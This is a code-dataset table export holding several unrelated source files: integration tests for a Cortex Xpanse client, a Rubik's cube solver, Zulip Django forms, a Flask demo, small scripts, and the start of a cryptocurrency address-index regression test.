blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2210ae26b179ba05004cd58b2a1d034630f3c058 | 0d55bde6f4784f6dea9e8e6945d05bbf627e1e7d | /Packs/CortexXpanse/Integrations/CortexXpanse/CortexXpanse_test.py | e5e1f54f5d007d64c3a3a149c6753ca5a12fdbdf | [
"MIT"
] | permissive | crestdatasystems/content | d7040415431b5d06d1569433a49869afcb0292bd | 5f0f00840c39f028dca8377551bbd725d8ee8a2d | refs/heads/master | 2023-08-16T19:35:38.150912 | 2023-07-11T05:59:59 | 2023-07-11T05:59:59 | 280,669,011 | 2 | 1 | MIT | 2023-03-10T16:00:35 | 2020-07-18T14:06:44 | Python | UTF-8 | Python | false | false | 11,965 | py | """
Tests module for Cortex Xpanse integration.
"""
def test_format_asm_id_func(requests_mock):
"""Tests format_asm_id helper function.
Given:
- Mock JSON pre-formatting from the list_asset_internet_exposure_command function
When:
- Sending JSON to format_asm_id function.
Then:
- Checks the output of the helper function with the expected output.
"""
from CortexXpanse import format_asm_id
from test_data.raw_response import INTERNET_EXPOSURE_PRE_FORMAT
from test_data.expected_results import INTERNET_EXPOSURE_POST_FORMAT
response = format_asm_id(INTERNET_EXPOSURE_PRE_FORMAT)
assert response == INTERNET_EXPOSURE_POST_FORMAT
def test_list_external_service_command(requests_mock):
"""Tests list_external_service_command command function.
Given:
- requests_mock instance to generate the appropriate list_external_service_command API response,
loaded from a local JSON file.
When:
- Running the 'list_external_service_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_external_service_command
from test_data.raw_response import EXTERNAL_SERVICES_RESPONSE
from test_data.expected_results import EXTERNAL_SERVICES_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_services/',
json=EXTERNAL_SERVICES_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'domain': 'testdomain.com',
}
response = list_external_service_command(client, args)
assert response.outputs == EXTERNAL_SERVICES_RESULTS
assert response.outputs_prefix == 'ASM.ExternalService'
assert response.outputs_key_field == 'service_id'
def test_get_external_service_command(requests_mock):
"""Tests get_external_service_command command function.
Given:
- requests_mock instance to generate the appropriate get_external_service_command API response,
loaded from a local JSON file.
When:
- Running the 'get_external_service_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, get_external_service_command
from test_data.raw_response import EXTERNAL_SERVICE_RESPONSE
from test_data.expected_results import EXTERNAL_SERVICE_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_service',
json=EXTERNAL_SERVICE_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'service_id': '94232f8a-f001-3292-aa65-63fa9d981427'
}
response = get_external_service_command(client, args)
assert response.outputs == EXTERNAL_SERVICE_RESULTS
assert response.outputs_prefix == 'ASM.ExternalService'
assert response.outputs_key_field == 'service_id'
def test_list_external_ip_address_range_command(requests_mock):
"""Tests list_external_ip_address_range_command function.
Given:
- requests_mock instance to generate the appropriate list_external_ip_address_range_command( API response,
loaded from a local JSON file.
When:
- Running the 'list_external_ip_address_range_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_external_ip_address_range_command
from test_data.raw_response import EXTERNAL_RANGES_RESPONSE
from test_data.expected_results import EXTERNAL_RANGES_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_ip_address_ranges/',
json=EXTERNAL_RANGES_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {}
response = list_external_ip_address_range_command(client, args)
assert response.outputs == EXTERNAL_RANGES_RESULTS
assert response.outputs_prefix == 'ASM.ExternalIpAddressRange'
assert response.outputs_key_field == 'range_id'
def test_get_external_ip_address_range_command(requests_mock):
"""Tests get_external_ip_address_range_command function.
Given:
- requests_mock instance to generate the appropriate get_external_ip_address_range_command( API response,
loaded from a local JSON file.
When:
- Running the 'get_external_ip_address_range_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, get_external_ip_address_range_command
from test_data.raw_response import EXTERNAL_RANGE_RESPONSE
from test_data.expected_results import EXTERNAL_RANGE_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_external_ip_address_range/',
json=EXTERNAL_RANGE_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'range_id': '1093124c-ce26-33ba-8fb8-937fecb4c7b6'
}
response = get_external_ip_address_range_command(client, args)
assert response.outputs == EXTERNAL_RANGE_RESULTS
assert response.outputs_prefix == 'ASM.ExternalIpAddressRange'
assert response.outputs_key_field == 'range_id'
def test_list_asset_internet_exposure_command(requests_mock):
"""Tests list_asset_internet_exposure_command function.
Given:
- requests_mock instance to generate the appropriate list_asset_internet_exposure_command( API response,
loaded from a local JSON file.
When:
- Running the 'list_asset_internet_exposure_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_asset_internet_exposure_command
from test_data.raw_response import EXTERNAL_EXPOSURES_RESPONSE
from test_data.expected_results import EXTERNAL_EXPOSURES_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_assets_internet_exposure/',
json=EXTERNAL_EXPOSURES_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'name': 'testdomain.com'
}
response = list_asset_internet_exposure_command(client, args)
assert response.outputs == EXTERNAL_EXPOSURES_RESULTS
assert response.outputs_prefix == 'ASM.AssetInternetExposure'
assert response.outputs_key_field == 'asm_ids'
def test_get_asset_internet_exposure_command(requests_mock):
"""Tests get_asset_internet_exposure_command function.
Given:
- requests_mock instance to generate the appropriate get_asset_internet_exposure_command( API response,
loaded from a local JSON file.
When:
- Running the 'get_asset_internet_exposure_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, get_asset_internet_exposure_command
from test_data.raw_response import EXTERNAL_EXPOSURE_RESPONSE
from test_data.expected_results import EXTERNAL_EXPOSURE_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/assets/get_asset_internet_exposure/',
json=EXTERNAL_EXPOSURE_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'asm_id': 'testdomain.com'
}
response = get_asset_internet_exposure_command(client, args)
assert response.outputs == EXTERNAL_EXPOSURE_RESULTS
assert response.outputs_prefix == 'ASM.AssetInternetExposure'
assert response.outputs_key_field == 'asm_ids'
def test_list_alerts_command(requests_mock):
"""Tests list_alerts_command function.
Given:
- requests_mock instance to generate the appropriate list_alerts_command( API response,
loaded from a local JSON file.
When:
- Running the 'list_alerts_command'.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, list_alerts_command
from test_data.raw_response import LIST_ALERTS_RESPONSE
from test_data.expected_results import LIST_ALERTS_RESULTS
requests_mock.post('https://test.com/api/webapp/public_api/v1/alerts/get_alerts/',
json=LIST_ALERTS_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
args = {
'limit': '2',
'severity': 'high',
'sort_by_creation_time': 'asc'
}
response = list_alerts_command(client, args)
assert response.outputs == LIST_ALERTS_RESULTS
assert response.outputs_prefix == 'ASM.Alert'
assert response.outputs_key_field == 'alert_id'
def test_fetch_incidents(requests_mock, mocker):
"""Tests fetch_incidents function.
Given:
- requests_mock instance to generate the appropriate fetch_incidents( API response,
loaded from a local JSON file.
When:
- Running the 'fetch_incidents' command.
Then:
- Checks the output of the command function with the expected output.
"""
from CortexXpanse import Client, fetch_incidents
import json
from test_data.raw_response import LIST_ALERTS_RESPONSE
requests_mock.post('https://test.com/api/webapp/public_api/v1/alerts/get_alerts/',
json=LIST_ALERTS_RESPONSE)
client = Client(
base_url='https://test.com/api/webapp/public_api/v1',
verify=True,
headers={
"HOST": "test.com",
"Authorizatio": "THISISAFAKEKEY",
"Content-Type": "application/json"
},
proxy=False)
last_run = {'last_fetch': 1659452708759}
next_run, incidents = fetch_incidents(
client=client,
max_fetch=2,
last_run=last_run,
first_fetch_time=1658452708759,
severity=None)
assert len(incidents) == 2
assert incidents[0]['name'] == "Networking Infrastructure"
assert json.loads(incidents[0]['rawJSON']).pop('local_insert_ts')
assert next_run == {'last_fetch': 1659452809020}
| [
"[email protected]"
] | |
8f7769ef093d5beca0d0d32a1807271d4d0060da | 761dbc29537f2271d7cac5ee55bf818cf3d94ee3 | /solver_methods.py | 6b2949e8036f047c4f0b16af10481ba7603d3b16 | [] | no_license | k-off/Rubik_brute_force | ee5d78d22ff72ecd312129787571635cd1f6d3fe | 8688a9e66f8b2d40afe46a449a2b830c5b461e6e | refs/heads/master | 2022-03-07T10:43:56.580884 | 2019-10-22T08:09:32 | 2019-10-22T08:09:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,791 | py | #******************************************************************************#
# #
# :::::::: #
# solver_methods module :+: :+: #
# +:+ #
# By: pacovali <[email protected]> +#+ #
# +#+ #
# Created: 2019/01/01 00:00:00 by pacovali #+# #+# #
# Updated: 2019/01/01 00:00:00 by pacovali ######## odam.nl #
# #
#******************************************************************************#
import numpy as np
from Rubik_class import Rubik
MAX_MOVES = 20;
def compare_cubes(self) :
return (np.array_equal(self.reference.F, self.mixed.F) and
np.array_equal(self.reference.R, self.mixed.R) and
np.array_equal(self.reference.B, self.mixed.B) and
np.array_equal(self.reference.L, self.mixed.L) and
np.array_equal(self.reference.U, self.mixed.U) and
np.array_equal(self.reference.D, self.mixed.D));
exit();
def check_iterator(i, skip) :
if skip < 0 :
return (False);
if (skip % 2 == 0 and i // 3 == skip) :
return (True);
if (skip % 2 == 1 and (skip - (i // 3) == 1 and skip - (i // 3) == 0)) :
return (True);
return (False);
def try_next(self, current_move_nr, allowed, inverse, solution, skip) :
current_move_nr += 1;
i = 0;
for move in allowed :
if check_iterator(i, skip) == False:
solution = np.append(solution, move);
self.mixed.choose_rotation(move);
is_equal = compare_cubes(self);
if is_equal == True:
return (np.array([True, solution]));
if is_equal == False and current_move_nr < self.peak_moves:
result = try_next(self, current_move_nr, allowed, inverse, solution, i // 3);
if (result[0] == True):
return (result);
for inv in inverse[i]:
self.mixed.choose_rotation(inv);
solution = np.delete(solution, -1);
i += 1;
current_move_nr -= 1;
return (np.array([False, solution]));
def solve(self):
solution = np.array([]);
solved = [False, solution];
while self.peak_moves < MAX_MOVES and solved[0] == False:
self.peak_moves += 1;
solved = try_next(self, 0, self.allowed, self.inverse, solution, -1);
if (solved[0] == True):
return (solved[1]); | [
"[email protected]"
] | |
76d96db4057deeca5c0be5158343d8ae8cd74e65 | e281ce2330656a6a0a7f795f535f78881df8b5ba | /Web/HelloWorld/Web1.py | e2342cf62a0c93cdd44e45b46e6c6ee836e8d8c8 | [] | no_license | sunruihua0522/SIG-PyCode | 70db0b57bbf9ce35dc42bd8de62c5bb56a2e888e | 483a67bf679f54ab7405c2362d9cfe47daa2bc0f | refs/heads/master | 2020-07-12T14:46:32.588227 | 2020-04-02T04:37:02 | 2020-04-02T04:37:02 | 204,842,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | from flask import Flask, Request
app =Flask(__name__)
@app.route('/')
def HelloWold():
return 'Hello World'
@app.route('/login/')
def Login():
return 'Login......'
@app.route('/login/<int:id>/')
def LoginWithVar(id):
return '<h1>Welcome %d to my world !</h1>'%id
@app.route("/foo/<string:username>/")
def foo(username):
return "loginSteing %s"%username
app.run(host ='0.0.0.0', port = 8080)
| [
"--global"
] | --global |
71f98b5c6f7a6e09c70a177a86d013d601ea80b4 | 8f1137592d670ce134821106f736e231b03ead87 | /mmdet/models/backbones/__init__.py | bed1d549993cacc78bc9d11bcb4b03efddd934ac | [
"MIT"
] | permissive | mousecpn/DMC-Domain-Generalization-for-Underwater-Object-Detection | fa426c834fa2a5cd2fe98c50dd4dfeda64fcdc79 | 133797cfb7553557fb81a37e3c99c88154a13765 | refs/heads/master | 2023-05-23T16:49:34.795363 | 2023-02-13T02:23:31 | 2023-02-13T02:23:31 | 501,597,077 | 16 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | # Copyright (c) OpenMMLab. All rights reserved.
from .csp_darknet import CSPDarknet
from .darknet import Darknet
from .detectors_resnet import DetectoRS_ResNet
from .detectors_resnext import DetectoRS_ResNeXt
from .hourglass import HourglassNet
from .hrnet import HRNet
from .mobilenet_v2 import MobileNetV2
from .pvt import PyramidVisionTransformer, PyramidVisionTransformerV2
from .regnet import RegNet
from .res2net import Res2Net
from .resnest import ResNeSt
from .resnet import ResNet, ResNetV1d
from .resnext import ResNeXt
from .ssd_vgg import SSDVGG
from .swin import SwinTransformer
from .trident_resnet import TridentResNet
from .hiddenMixupResnet1 import HiddenMixupResNet,ContrastiveHiddenMixupResNet
__all__ = [
'RegNet', 'ResNet', 'ResNetV1d', 'ResNeXt', 'SSDVGG', 'HRNet',
'MobileNetV2', 'Res2Net', 'HourglassNet', 'DetectoRS_ResNet',
'DetectoRS_ResNeXt', 'Darknet', 'ResNeSt', 'TridentResNet', 'CSPDarknet',
'SwinTransformer', 'PyramidVisionTransformer', 'PyramidVisionTransformerV2','ContrastiveHiddenMixupResNet','HiddenMixupResNet'
]
| [
"[email protected]"
] | |
9eb0eefa8a96b1ade59c85a7d02aab823056e1af | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/119/usersdata/239/27344/submittedfiles/al1.py | 6c815196c1dc7bc1a3f761f112f9ee81f7fa36b9 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | # -*- coding: utf-8 -*-
print("Programa de conversão de temperatura: °C -> °F")#Nome de apresentação do aplicativo
print("")
C = float(input("Digite a temperatura em °C:"))#Declarando a entrada
F = ((9*C)+160)/5#Processamento
print("O valor em °F é: %.2f"%F)#Linha para apresentar a saída
| [
"[email protected]"
] | |
b650ce40f2448c5bb65139c22519be4c58cbe7dc | 2af9c17cf29a9bba3f3e714c861e8f89ee5fc488 | /python code/HR33_itertools_product.py | f9633579a94bd1807b00e7a86ee8e8966bd4a1e5 | [] | no_license | Binay28/Binay-s_Code | 9df3315bf9433d62a3b2228ea3f87be93917e5b3 | 7e05c39a753fab79a4518119d41953827dba10c9 | refs/heads/master | 2022-11-18T16:00:19.325948 | 2020-07-16T12:16:38 | 2020-07-16T12:16:38 | 198,006,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | from itertools import product
A=list(map(int,input().split()))
B=list(map(int,input().split()))
print(*product(A,B))
#product(A, B) returns the same as ((x,y) for x in A for y in B)
| [
"[email protected]"
] | |
d0f753d2a8be20ef8fd60993a5117e1ad9ed3bfe | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/zulip/2016/12/forms.py | b2be52e7bd7ffa58c1133a0a90f5faa3a8bbd5a4 | [] | no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 9,035 | py | from __future__ import absolute_import
from django import forms
from django.conf import settings
from django.contrib.auth.forms import SetPasswordForm, AuthenticationForm, \
PasswordResetForm
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.db.models.query import QuerySet
from django.utils.translation import ugettext as _
from jinja2 import Markup as mark_safe
from zerver.lib.actions import do_change_password, is_inactive, user_email_is_unique
from zerver.lib.name_restrictions import is_reserved_subdomain, is_disposable_domain
from zerver.lib.utils import get_subdomain, check_subdomain
from zerver.models import Realm, get_user_profile_by_email, UserProfile, \
get_realm_by_email_domain, get_realm_by_string_id, \
get_unique_open_realm, email_to_domain, email_allowed_for_realm
from zproject.backends import password_auth_enabled
import logging
import re
import DNS
from typing import Any, Callable, Optional, Text
MIT_VALIDATION_ERROR = u'That user does not exist at MIT or is a ' + \
u'<a href="https://ist.mit.edu/email-lists">mailing list</a>. ' + \
u'If you want to sign up an alias for Zulip, ' + \
u'<a href="mailto:[email protected]">contact us</a>.'
WRONG_SUBDOMAIN_ERROR = "Your Zulip account is not a member of the " + \
"organization associated with this subdomain. " + \
"Please contact %s with any questions!" % (settings.ZULIP_ADMINISTRATOR,)
def get_registration_string(domain):
# type: (Text) -> Text
register_url = reverse('register') + domain
register_account_string = _('The organization with the domain already exists. '
'Please register your account <a href=%(url)s>here</a>.') % {'url': register_url}
return register_account_string
def email_is_not_mit_mailing_list(email):
# type: (Text) -> None
"""Prevent MIT mailing lists from signing up for Zulip"""
if "@mit.edu" in email:
username = email.rsplit("@", 1)[0]
# Check whether the user exists and can get mail.
try:
DNS.dnslookup("%s.pobox.ns.athena.mit.edu" % username, DNS.Type.TXT)
except DNS.Base.ServerError as e:
if e.rcode == DNS.Status.NXDOMAIN:
raise ValidationError(mark_safe(MIT_VALIDATION_ERROR))
else:
raise
class RegistrationForm(forms.Form):
full_name = forms.CharField(max_length=100)
# The required-ness of the password field gets overridden if it isn't
# actually required for a realm
password = forms.CharField(widget=forms.PasswordInput, max_length=100,
required=False)
realm_name = forms.CharField(max_length=100, required=False)
realm_subdomain = forms.CharField(max_length=40, required=False)
realm_org_type = forms.ChoiceField(((Realm.COMMUNITY, 'Community'),
(Realm.CORPORATE, 'Corporate')),
initial=Realm.COMMUNITY, required=False)
if settings.TERMS_OF_SERVICE:
terms = forms.BooleanField(required=True)
def clean_realm_subdomain(self):
# type: () -> str
if settings.REALMS_HAVE_SUBDOMAINS:
error_strings = {
'too short': _("Subdomain needs to have length 3 or greater."),
'extremal dash': _("Subdomain cannot start or end with a '-'."),
'bad character': _("Subdomain can only have lowercase letters, numbers, and '-'s."),
'unavailable': _("Subdomain unavailable. Please choose a different one.")}
else:
error_strings = {
'too short': _("Short name needs at least 3 characters."),
'extremal dash': _("Short name cannot start or end with a '-'."),
'bad character': _("Short name can only have lowercase letters, numbers, and '-'s."),
'unavailable': _("Short name unavailable. Please choose a different one.")}
subdomain = self.cleaned_data['realm_subdomain']
if not subdomain:
return ''
if len(subdomain) < 3:
raise ValidationError(error_strings['too short'])
if subdomain[0] == '-' or subdomain[-1] == '-':
raise ValidationError(error_strings['extremal dash'])
if not re.match('^[a-z0-9-]*$', subdomain):
raise ValidationError(error_strings['bad character'])
if is_reserved_subdomain(subdomain) or \
get_realm_by_string_id(subdomain) is not None:
raise ValidationError(error_strings['unavailable'])
return subdomain
class ToSForm(forms.Form):
terms = forms.BooleanField(required=True)
class HomepageForm(forms.Form):
email = forms.EmailField(validators=[is_inactive])
def __init__(self, *args, **kwargs):
# type: (*Any, **Any) -> None
self.realm = kwargs.pop('realm', None)
super(HomepageForm, self).__init__(*args, **kwargs)
def clean_email(self):
# type: () -> str
"""Returns the email if and only if the user's email address is
allowed to join the realm they are trying to join."""
email = self.cleaned_data['email']
if get_unique_open_realm():
return email
# Otherwise, the user is trying to join a specific realm.
realm = self.realm
if realm is None and not settings.REALMS_HAVE_SUBDOMAINS:
realm = get_realm_by_email_domain(email)
if realm is None:
if settings.REALMS_HAVE_SUBDOMAINS:
raise ValidationError(_("The organization you are trying to join does not exist."))
else:
raise ValidationError(_("Your email address does not correspond to any existing organization."))
if realm.invite_required:
raise ValidationError(_("Please request an invite from the organization administrator."))
if not email_allowed_for_realm(email, realm):
raise ValidationError(
_("The organization you are trying to join, %(string_id)s, only allows users with e-mail "
"addresses within the organization. Please try a different e-mail address."
% {'string_id': realm.string_id}))
if realm.is_zephyr_mirror_realm:
email_is_not_mit_mailing_list(email)
return email
def email_is_not_disposable(email):
# type: (Text) -> None
if is_disposable_domain(email_to_domain(email)):
raise ValidationError(_("Please use your real email address."))
class RealmCreationForm(forms.Form):
# This form determines whether users can create a new realm.
email = forms.EmailField(validators=[user_email_is_unique, email_is_not_disposable])
class LoggingSetPasswordForm(SetPasswordForm):
def save(self, commit=True):
# type: (bool) -> UserProfile
do_change_password(self.user, self.cleaned_data['new_password1'],
log=True, commit=commit)
return self.user
class ZulipPasswordResetForm(PasswordResetForm):
def get_users(self, email):
# type: (str) -> QuerySet
"""Given an email, return matching user(s) who should receive a reset.
This is modified from the original in that it allows non-bot
users who don't have a usable password to reset their
passwords.
"""
if not password_auth_enabled:
logging.info("Password reset attempted for %s even though password auth is disabled." % (email,))
return []
result = UserProfile.objects.filter(email__iexact=email, is_active=True,
is_bot=False)
if len(result) == 0:
logging.info("Password reset attempted for %s; no active account." % (email,))
return result
class CreateUserForm(forms.Form):
full_name = forms.CharField(max_length=100)
email = forms.EmailField()
class OurAuthenticationForm(AuthenticationForm):
def clean_username(self):
# type: () -> str
email = self.cleaned_data['username']
try:
user_profile = get_user_profile_by_email(email)
except UserProfile.DoesNotExist:
return email
if user_profile.realm.deactivated:
error_msg = u"""Sorry for the trouble, but %s has been deactivated.
Please contact %s to reactivate this group.""" % (
user_profile.realm.name,
settings.ZULIP_ADMINISTRATOR)
raise ValidationError(mark_safe(error_msg))
if not check_subdomain(get_subdomain(self.request), user_profile.realm.subdomain):
logging.warning("User %s attempted to password login to wrong subdomain %s" %
(user_profile.email, get_subdomain(self.request)))
raise ValidationError(mark_safe(WRONG_SUBDOMAIN_ERROR))
return email
| [
"[email protected]"
] | |
548e6b996617ab7253f3a41fa7c7838b9df2aad1 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /qeyinsjZHCPEddbfe_3.py | 101cca3e7846d04b82b150f8b95efd2e70cbf0e5 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py |
def dice_game(lst):
result = [0 if x == y else x + y for x, y in lst]
if 0 in result:
return 0
else:
return sum(result)
| [
"[email protected]"
] | |
52d55eaa96a718f0192d07bd30328853a449ba83 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02419/s944531801.py | 0470606a21cac3803c17734548ec73c240969efd | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | W=raw_input()
T=[]
while 1:
x=raw_input()
if x=="END_OF_TEXT": break
T+=[v.lower() for v in x.split()]
print T.count(W) | [
"[email protected]"
] | |
058384b59e30522de87ae1f0a3b05a247b264dd1 | c0ba52c370f3c41471308588d49ae75f975d9b49 | /qa/rpc-tests/addressindex.py | bf539ced19ceecddb492dd85fbce51b93697576f | [
"MIT"
] | permissive | mirzaei-ce/core-aghilbit | 7f318a7487675ef7a38280d7b19284c3227cea52 | 4a4ce7b0da3fe01246f300a6809cda68d0708ef6 | refs/heads/master | 2021-07-12T08:21:29.796955 | 2017-10-16T16:56:05 | 2017-10-16T16:56:05 | 107,156,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,755 | py | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test addressindex generation and fetching
#
import time
from test_framework.test_framework import AghilbitTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
import binascii
class AddressIndexTest(AghilbitTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 4)
def setup_network(self):
self.nodes = []
# Nodes 0/1 are "wallet" nodes
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-relaypriority=0"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-debug", "-addressindex"]))
# Nodes 2/3 are used for testing
self.nodes.append(start_node(2, self.options.tmpdir, ["-debug", "-addressindex", "-relaypriority=0"]))
self.nodes.append(start_node(3, self.options.tmpdir, ["-debug", "-addressindex"]))
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[0], 2)
connect_nodes(self.nodes[0], 3)
self.is_network_split = False
self.sync_all()
def run_test(self):
print "Mining blocks..."
self.nodes[0].generate(105)
self.sync_all()
chain_height = self.nodes[1].getblockcount()
assert_equal(chain_height, 105)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that balances are correct
balance0 = self.nodes[1].getaddressbalance("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(balance0["balance"], 0)
# Check p2pkh and p2sh address indexes
print "Testing p2pkh and p2sh address index..."
txid0 = self.nodes[0].sendtoaddress("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs", 10)
self.nodes[0].generate(1)
txidb0 = self.nodes[0].sendtoaddress("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", 10)
self.nodes[0].generate(1)
txid1 = self.nodes[0].sendtoaddress("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs", 15)
self.nodes[0].generate(1)
txidb1 = self.nodes[0].sendtoaddress("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", 15)
self.nodes[0].generate(1)
txid2 = self.nodes[0].sendtoaddress("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs", 20)
self.nodes[0].generate(1)
txidb2 = self.nodes[0].sendtoaddress("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", 20)
self.nodes[0].generate(1)
self.sync_all()
txids = self.nodes[1].getaddresstxids("mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs")
assert_equal(len(txids), 3)
assert_equal(txids[0], txid0)
assert_equal(txids[1], txid1)
assert_equal(txids[2], txid2)
txidsb = self.nodes[1].getaddresstxids("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(len(txidsb), 3)
assert_equal(txidsb[0], txidb0)
assert_equal(txidsb[1], txidb1)
assert_equal(txidsb[2], txidb2)
# Check that limiting by height works
print "Testing querying txids by range of block heights.."
height_txids = self.nodes[1].getaddresstxids({
"addresses": ["2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br"],
"start": 105,
"end": 110
})
assert_equal(len(height_txids), 2)
assert_equal(height_txids[0], txidb0)
assert_equal(height_txids[1], txidb1)
# Check that multiple addresses works
multitxids = self.nodes[1].getaddresstxids({"addresses": ["2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br", "mo9ncXisMeAoXwqcV5EWuyncbmCcQN4rVs"]})
assert_equal(len(multitxids), 6)
assert_equal(multitxids[0], txid0)
assert_equal(multitxids[1], txidb0)
assert_equal(multitxids[2], txid1)
assert_equal(multitxids[3], txidb1)
assert_equal(multitxids[4], txid2)
assert_equal(multitxids[5], txidb2)
# Check that balances are correct
balance0 = self.nodes[1].getaddressbalance("2N2JD6wb56AfK4tfmM6PwdVmoYk2dCKf4Br")
assert_equal(balance0["balance"], 45 * 100000000)
